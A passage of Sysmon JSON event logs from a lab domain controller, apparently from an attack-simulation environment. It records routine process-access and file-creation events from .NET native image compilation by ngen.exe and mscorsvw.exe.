C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:40.949","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-0010B91A0D00}","TargetProcessId":"3368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6978,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:40.965\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0490-5F25-0000-0010863F0E00}\r\nTargetProcessId: 3368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:40.965","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0490-5F25-0000-0010863F0E00}","TargetProcessId":"3368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6979,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:41.261\r\nProcessGuid: {A837DB8D-0490-5F25-0000-0010863F0E00}\r\nProcessId: 3368\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d28-0\\Microsoft.VisualBasic.Compatibility.Data.dll\r\nCreationUtcTime: 2020-08-01 05:58:41.261","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:41.261","ProcessGuid":"{A837DB8D-0490-5F25-0000-0010863F0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d28-0\\Microsoft.VisualBasic.Compatibility.Data.dll","CreationUtcTime":"2020-08-01 05:58:41.261","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6980,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.293\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001022450E00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.293","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001022450E00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6981,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.293\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001022450E00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.293","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001022450E00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6982,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001022450E00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001022450E00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6983,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.324\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010D0C90C00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.324","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010D0C90C00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6984,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.324\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010D0C90C00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.324","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010D0C90C00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6985,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010D0C90C00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010D0C90C00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6986,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:41.355\r\nProcessGuid: {A837DB8D-0491-5F25-0000-001001480E00}\r\nProcessId: 4300\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10cc-0\\Microsoft.VisualC.dll\r\nCreationUtcTime: 2020-08-01 05:58:41.355","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:41.355","ProcessGuid":"{A837DB8D-0491-5F25-0000-001001480E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10cc-0\\Microsoft.VisualC.dll","CreationUtcTime":"2020-08-01 05:58:41.355","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
